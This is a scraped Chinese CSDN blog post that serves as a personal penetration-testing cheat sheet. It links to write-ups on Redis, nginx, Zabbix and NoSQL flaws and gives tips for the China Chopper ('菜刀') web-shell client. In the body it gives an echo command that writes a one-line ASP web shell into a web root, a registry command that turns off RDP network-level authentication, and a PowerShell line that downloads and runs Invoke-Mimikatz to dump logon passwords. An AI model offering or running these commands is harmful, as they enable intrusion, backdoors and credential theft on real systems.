不错的漏洞

最新推荐文章于 2023-12-09 16:59:55 发布
最新推荐文章于 2023-12-09 16:59:55 发布
阅读量1k 收藏
点赞数
分类专栏: 安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/50085923
版权

http://www.secpulse.com/archives/3537.html

http://www.secpulse.com/archives/2225.html

http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/

http://drops.wooyun.org/papers/2466

菜刀技巧:

有两种方法可以设置指定的cmd路径,一就是在cmd操作界面,输入setp d:\cmd.exe,就可以了,或者把cmd.exe上传到目录,然后点右键,点virtual terminal file,就可以进入自定义CMD.EXE路径的命令行了


写木马技巧

echo ^<^%execute^(request^("eval"^)^)^%^>  c:\inetpub\wwwroot\cms\test123456.asp

内网渗透:

http://www.freebuf.com/articles/system/8499.html


nginx解析漏洞

http://drops.wooyun.org/tips/2006

http://segmentfault.com/q/1010000002927290

http://www.jb51.net/article/74629.htm


zabbix漏洞:


http://www.wooyun.org/bugs/wooyun-2013-023089
http://wooyun.org/bugs/wooyun-2010-0149599


nosql注入:

http://www.freebuf.com/articles/database/95314.html


hydra爆破3389:

http://www.cnblogs.com/hkleak/p/5169079.html


sql server的xp_cmdshell

http://www.freebuf.com/articles/web/55577.html



linux 的rdesktop连接win出现 Failed to connect, CredSSP required by server 解决方式:

在win上执行:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

就好了



powershell 的mimikatz


powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –command sekurlsa::logonpasswords

niexinming
关注
专栏目录
MSSQL数据库攻防实战指北
further_eye的博客
04-22 1740
by Tahir 前言 一年一度的网络安全建设成果检验即将开始,在网络安全实战攻防演练这场最关键的战役中,办公应用系统、Web中间件,数据库等是攻击方主要的攻击对象,由于使用量最大,数据库往往会成为攻击者的首选目标之一。 以微软SQL Server为例,除了常见的SQL注入漏洞,攻击方还会用一些“出其不意”的招式,将SQL Server原本的优势转变为攻击的突破口,比如在相应的权限下,攻击者可以利用SQL Server强大的存储过程执行不同的高级功能,通过增加SQL Server数据库用户,权限维持等
windows反弹shell复现
就是我的博客
04-06 1万+
windows反弹shell 简介: reverse shell(反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell类似,本质上是网络概念的客户端与服务端的角色反转,就是让目标机执行反向连接攻击机。 在实战中多配置命令执行等漏洞进行使用。 环境: 攻击机:IP为192.168.1.111,系统信息 Linux kali 5.10.0-kali3-amd6...
CentOS Liunx 7 使用rdesktop远程连接阿里云服务器出现Failed to connect, CredSSP required by server.
道一哥哥
06-19 8327
注:阿里云服务器系统镜像为:Windows Server 2012 D2 Datacenter。具体原因还不清楚,不过这样操作后成功连接上阿里云服务器。2.右键我的电脑->属性->远程设置->远程。1.在网页端远程连接服务器。
linux使用rdesktop连接远程提示:Failed to connect, CredSSP required by server (check if server has disabled ol
10-09 1042
Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate. Failed to initialize NLA, do you have correct Kerberos TGT initialized ? Failed to connect, CredSSP required by serv
网站安全检测:推荐 8 款免费的 Web 安全测试工具
2201_75735270的博客
12-09 3390
随着 Web 应用越来越广泛,Web 安全威胁日益凸显。黑客利用网站操作系统的漏洞和服务程序的 SQL 注入漏洞等得到 Web 服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更为严重的则是在网页中植入恶意代码,使得网站访问者受到侵害。这也使得越来越多的用户关注应用层的安全问题,对 Web 应用安全的关注度也逐渐升温。下面向大家推荐 8 款非常有用的免费安全测试工具。
Test404漏洞扫描器,功能不错,挺全面!
07-17
Test404是一款备受好评的漏洞扫描器,其在IT安全领域中被广泛使用,尤其在渗透测试和网络防御方面发挥了重要作用。这款工具的特点在于它整合了大量的插件和功能,使得用户无需使用多个工具,就能完成多种类型的漏洞...
thinkphp漏洞图形化综合利用工具
05-23
Thinkphp(GUI)漏洞综合利用工具,支持各版本TP漏洞检测,命令执行,getshell。 (如果感觉对您有帮助,感觉不错的话,请您给个大大的支持) JFormDesigner可视化编写,没有javafx可视化好用(建议学javafx)。 检测不...
mysql漏洞如何打补丁_漏洞治理(漏洞情报)调研报告
weixin_39851457的博客
11-23 1478
君哥有话说漏洞运营和安全资产运营是快速收敛攻击面的最有效的两个措施,需要企业安全建设负责人首要关注,并投入大量精力确保漏洞管理的各项细节落地,包括漏洞发现、漏洞推修、漏洞验证等各个环节,这里面的细节很多,比如覆盖率、漏扫范围、漏扫技术细节(未登陆扫描、被动式扫描)、漏扫类别、漏洞修复方式、不能修的漏洞补偿性措施、漏洞考核、避免历史漏洞重现等等。推荐泉哥的一本书《漏洞战争:软件漏洞分析精要...
吾爱漏洞网站seo整站优化分析
07-22
视频仅供学习交流 网站seo整站优化分析视频介绍: 今天有个网友与我交换友情链接,他的站域名不错,就是站内优化需要改进一下,想要优化的主词都没有体现,我以前录制过一套视频是SEO内容优化系列实战视频(1-8课)...
python毕业设计之漏洞扫描系统源码.zip
07-14
对于更复杂的设计,`PyQt`或`wxPython`也是不错的选择。 5. **依赖管理**:在"扫描需要安装的包视频-必须操作.zip"中,可能包含指导如何安装和配置项目所需库的教程。这可能涉及到使用`pip`管理Python包,确保所有...
Netsparker安装包下载
02-23
Acunetix Web Vulnerability Scanner(简称AWVS)是一款知名的网络漏洞扫描工具,它通过网络爬虫测试你的网站安全,检测流行安全漏洞
NetsparkerCommunityEdition3.0
08-06
强大的web检测技术可以检测包括js,sql注入一剂xss等一系列网络漏洞,帮助提高软件本身的安全性。
安全测试工具 NetsparkerCommunityEdition
06-24
一款不错安全测试工具,可以自动检测SQL注入漏洞、JavaScript脚本漏洞,并提出相应的解决方案
Netsparker超轻量级Web安全漏洞扫描工具使用教程介绍
墨痕诉清风的博客
05-09 1万+
有特征 此工具分为收费版本和绿色版本 绿色版本也是很强大的 一 、Netsparker工具简介 Netsparker是一款综合型的web应用安全漏洞扫描工具,它分为专业版和免费版,免费版的功能也比较强大。Netsparker与其他综合 性的web应用安全扫描工具相比的一个特点是它能够更好的检测SQL Injection和 Cross-site Scripting类型的安全漏洞。 二...
远程桌面发生身份验证错误,要求的函数不受支持[MSTSC]
热门推荐
小杨子
05-10 9万+
远程桌面发生身份验证错误,要求的函数不受支持 转载: 【https://www.zhangfangzhou.cn/authentication-error.html】 【https://blog.csdn.net/wyhwlls/article/details/80320301】 An authentication error has occurred and the require...
rdesktop无法连接windows server 2012的问题解决
wanfahui的博客
12-14 1555
在用rdesktop连接的时候出现了 ERROR: recv: Connection reset by peer 的问题 。 中文页面搜不到解决方法,在ubuntuforums上看到了解决方法,我的电脑-》属性-》远程 去掉仅允许运行使用网络级别身份认证的远程桌面计算机的连接。的勾就可以了 另附远程桌面多开的方法 [HKEY_LOCAL_M
关于Android的root提权漏洞
Tesi1a的充电桩
09-09 1万+
以下两个转自于知乎少仲哥 和flanker_hqd的回答:1.CVE-2009-2692(Wunderbar/asroot)sock_sendpage()的空指针解引用.因为sock_sendpage 没有对 socket_file_ops 结构的 sendpage 字段做指针检查,有些模块不具备sendpage 功能,初始时赋为 NULL,这样,没有做检查的sock_sendpage 有可能直接调
[原创]超轻量级Web安全漏洞扫描工具Netsparker使用教程介绍
weixin_33701564的博客
08-10 798
[原创]超轻量级Web安全漏洞扫描工具Netsparker使用教程介绍 一 Netsparker工具简介   Netsparker是一款综合型的web应用安全漏洞扫描工具,它分为专业版和免费版,免费版的功能也比较强大。Netsparker与其他综合 性的web应用安全扫描工具相比的一个特点是它能够更好的检测SQL Injection和 Cross-site Scripting类型的安全漏洞。 ...
使用ysoserial生成反序列化文件
一个码农的笔记
06-01 3万+
感谢清水大佬的帮助,这个代码是他的 import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; import ysoserial.payloads.CommonsBeanutils1; public class Test { public Test() { } public
cnvd漏洞挖掘教程
最新发布
02-29
很抱歉,我不能提供关于漏洞挖掘的教程或指导。漏洞挖掘是一项高级技术,需要深入的计算机安全知识和...另外,参加相关的安全培训课程或者加入安全社区也是一个不错的选择,这样您可以与其他安全专业人士交流和学习。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值